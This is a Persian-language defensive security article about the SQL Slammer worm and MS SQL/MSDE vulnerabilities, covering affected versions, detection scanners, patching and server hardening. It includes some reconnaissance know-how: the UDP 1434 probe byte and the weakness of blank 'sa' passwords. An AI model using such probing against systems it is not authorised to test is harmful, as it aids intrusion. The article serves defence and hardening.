با توجه به اينکه SQL Slammer از يک Buffer overflow بر روی سيستم مقصد استفاده می نمايد ،استفاده مستمر از Patching و  پيکربندی دقيق سيستم ، کمک لازم در جهت کاهش تهديد فوق را ارائه می نمايد . با دريافت و استفاده از ابزارهای دفاعی نظير : Microsoft SQL Critical Update Kit ، می توان تمام Domain و يا شبکه های شامل سيستم های آسيب پذير را بررسی و بصورت فايل های متاثر را بهنگام نمود. برای آشنائی و آناليز جزيئات مربوط به کرم  اسلامر SQL/MSDE ، می توان از آدرس Incidents.org استفاده نمود .

سيستم های عامل در معرض تهديد :
هر يک از نسخه های ويندوز که  بهمراه آنان  SQL/MSDE Server 7.0  ، SQL/MSDE Server 2000 و يا Microsoft SQL/MSDE Desktop Engine 2000 نصب شده باشد و هر سيستم نرم افزاری ديگری که بصورت جداگانه از موتور MSDE 2000 استفاده می نمايد،  در معرض اين تهديد و آسيب قرار خواهد شد .

نحوه تشخيص آسيب پذيری سيستم
شرکت مايکروسافت مجموعه ای از ابزارهای امنيتی را در اين رابطه ارائه که می توان از طريق آدرس  http://www.microsoft.com/sql/downloads/securitytools.asp به آنان دستيابی پيدا نمود . Toolkit ارائه شده ،SQL Critical Update Kit  ناميده شده و شامل ابزارهائی نظير SQL Scan و SQL Critical Update است . سايت SqlSecurity.com نيز در اين رابطه ابزاری با نام SQLPingv2.2  را ارائه داده است .ابزار فوق ، يک بسته اطلاعاتی UDP تک بايتی ( مقدار بايت 0X02 ) را به پورت 1434  مربوط به يک ميزبان و يا تمامی Subnet ارسال می نمايد .سرويس دهندگان SQL که به پورت UDP 1434  گوش می دهند ، به آن پاسخ  لازم را داده و اطلاعاتی در ارتباط با سيستم نظير شماره نسخه و ساير موارد مربوطه را اعلام می نمايد . عملکرد نرم افزار فوق مشابه Microsoft SQL Scan است .

نحوه حفاظت در مقابل نقطه آسيب پذير :
بمنظور حفاظت سيستم ها  در مقابل نقطه آسيب پذير فوق ، عمليات زير را دنبال می نمائيم :

• غير فعال نمودن SQL/MSDE Monitor Service در پورت UDP 1434 .  بمنظورانجام خواسته  فوق، می توان اقدام به نصب و استفاده از قابليت های ارائه شده بهمراه SQL Server 2000 Service Pack 3a نمود. موتور MSDE 2000  دارای دو نقطه آسيب پذير Buffer Overflow است که می تواند توسط يک مهاجم استفاده و از راه دور و بدون هيچگونه الزامی جهت  تائيد کاربر، به سرويس دهنده متصل و يک تهاجم از طريق UDP را باعث شود. صرفنظر از اينکه پردازه های  MSDE 2000  در بافتار امنيتی يک Domain User و يا account مربوط به Local System  اجراء می گردند ، استفاده موفقيت آميز از حفره های امنيتی موجود، ممکن است سيستم مقصد را در معرض مخاطره و تهديد قرار دهد . کرم MS-SQL/MSDE Slammer يک بسته اطلاعاتی شامل  376 بايت را از طريق پورت UDP 1434 برای مقصد مورد نظر خود که بصورت تصادفی انتخاب می گردد، ارسال می نمايد. سيستم های در معرض تهاجم  پس از آلودگی ، اقدام به ارسال بسته های اطلاعاتی مشابه 376 بايتی می نمايند . کرم فوق ،  ترافيک موجود در شبکه را افزايش خواهد داد .آدرس های IP که بصورت تصادفی انتخاب می گردند ، از نوع multicast بوده و در نهايت يک تهاجم از نوع DoS ( غير فعال نمودن يک سرويس ) بر روی شبکه مقصد، محقق خواهد شد. بر اساس گزارشات ثبت شده ، يک ماشين آلوده  بيش از پنجاه  MB/Sec  از ترافيک شبکه رابخود اختصاص و عملا" امکان انجام ساير عمليات بر روی شبکه سلب می گردد.
• بکارگيری آخرين Service Pack برای سرويس دهنده SQL/MSDE و MSDE 2000 . آخرين نسخه های Service Pack در رابطه با سرويس دهنده SQL/MSDE  عبارتند از :
  - SQL/MSDE Server 7.0 Service Pack 4
  - MSDE/SQL Server 2000 Service Pack 3a 
  بمنظور اطمينان از بهنگام بودن سيستم می توان از "  Make Your SQL/MSDE Servers Less Vulnerable "   استفاده نمود.
• بکارگيری آخرين Patch ارائه شده پس از آخرين Service Pack . بمنظور آگاهی از آخرين Patch های ارائه شده برای تمامی نسخه های سرويس دهنده SQL/MSDE/MSDE می توان از بولتن امنيتی ارائه شده توسط مايکروسافت استفاده نمود .  بمنظور اطمينان از نصب آخرين Patch موجود در رابطه با سرويس دهنده SQL/MSDE می توان از آدرس های زير استفاده کرد :
  - Microsoft SQL/MSDE Server 7.0
  - Microsoft SQL Server 2000
  - MSDE Server Desktop Engine 2000 (MSDE 2000)
• بکارگيری Patch های  خاص و جداگانه ای که پس از آخرين Patch مربوطه ارائه شده اند .پس از معرفی  MS02-061 Elevation of Privilege in SQL/MSDE Server Web Tasks ، تاکنون  Patch مربوطه ای در اين زمينه ارائه نشده است . بمنظور اطمينان و آگاهی از اخرين Patch ارائه شده می توان از آدرس های زير استفاده نمود :
  - Microsoft SQL/MSDE Server 7.0
  - Microsoft SQL Server 2000
  - MSDE Server Desktop Engine 2000 (MSDE 2000)
• فعال نمودن SQL Server Authentication Logging .  امکان فوق عموما" غير فعال است . بمنظور فعال نمودن آن می توان از طريق برنامه Enterprise Manager  اقدام نمود(  Server Properties|Tab Security )
• ايمن سازی سرويس دهنده در سطح سيستم و شبکه . يکی از متداولترين حملات MSSQL/MSDE ، برخاسته از account مديريتی پيش فرض ( شناخته شده با نام "sa" ) بوده  که دارای  يک رمز عبور تهی ( blank ) است. در صورتيکه sa Account مربوط به SQL/MSDE  دارای رمز عبور حفاظت شده ای نمی باشد ، سيستم در معرض تهديد جدی قرار خواهد داشت . لازم است در اين راستا از پيشنهادات ارائه شده در بخش System Administrator(SA) Login مربوط به SQL/MSDE Server Book Online استفاده تا اطمينان لازم در خصوص مطمئن بودن رمز عبور sa Account حاصل گردد . ( حتی اگر سرويس دهنده SQL/MSDE مربوطه از account فوق استفاده نمی نمايد، نيز می بايست اقدامات امنيـتی لازم ضورت پذيرد ) . با استفاده از مستندات ارائه شده در MSDN مايکروسافت و در بخش Changing the SQL Server Administrator Login ، و  Verify and Change the System Administrator Password by Using MSDE می توان از آخرين امکانات و توصيه های ارائه شده بمنظور پيکربندی و تنظيم مناسبsa Account  ، استفاده نمود .
• به حداقل رساندن امتيازات مربوط به سرويس MSSQL/MSDE و سرويس دهنده SQL/MSDE Server Agent . در اين رابطه پيشنهاد می گردد که سرويس MSSQL/MSDE  سرويس دهنده و SQL/MSDE Server Agent ، تحت يک Valid Domain account با حداقل امتيازات مربوط اجراء گردد( نه بعنوان يک domain administrator  و يا SYSTEM ( در ويندوز NT ) و يا LocalSystem ( در ويندوز 2000 و يا XP ) ) . يک سرويس در معرض آسيب که بهمراه امتيازات محلی و يا Domain اجراء می گردد ،به يک مهاجم امکان کنترل کامل سيستم و يا شبکه را خواهد داد  . در اين رابطه موارد زير پيشنهاد می گردد :
  - فعال نمودن Windows NT Authentication و auditing برای Login های موفقيت آميز و يا با شکست مواجه شده ، در ادامه سرويس MSSQL/MSDEServer رامتوقف و مجددا" آنان را فعال  نمائيد . در صورت امکان ، پيکربندی سرويس گيرندگان را بگونه ای انجام دهيد که از NT Authentication  استفاده نمايند .
  - فيلترينگ بسته های اطلاعاتی می بايست در محدوده های مرزی شبکه انجام تا پيشگيری و ممانعت  لازم در خصوص اتصالات ورودی و خروجی غير مجاز به MSSQL و مرتبط با سرويس های خاص صورت پذيرد . فيلترينگ نقطه ورود و خروج پورت های 1434 و 1433 مربوط به TCP/UDP می تواند باعث ممانعت مهاجمان داخلی و يا خارجی از پويش و آلودگی سرويس دهندگان SQL/MSDE که دارای پتانسيل آسيب پذيری می باشند، گردد .
  - درصورتيکه لازم است از پورت های 1433 و 1434 مربوط به TCP/UDP استفاده گردد ، می بايست فيلترينگ مناسبی در ارتباط با استفاده نادرست از پورت های فوق را انجام داد .

بمنظور  آگاهی از  ايمن سازی سرويس دهنده SQL/MSDE ، می توان از آدرس های زير استفاده نمود :

• Microsoft SQL/MSDE Server 7.0 Security
• Microsoft SQL/MSDE Server 2000 Security

در بخش دوم اين مقاله به بررسی  ساير نقاط آسيب پذير در ويندوز خواهيم پرداخت .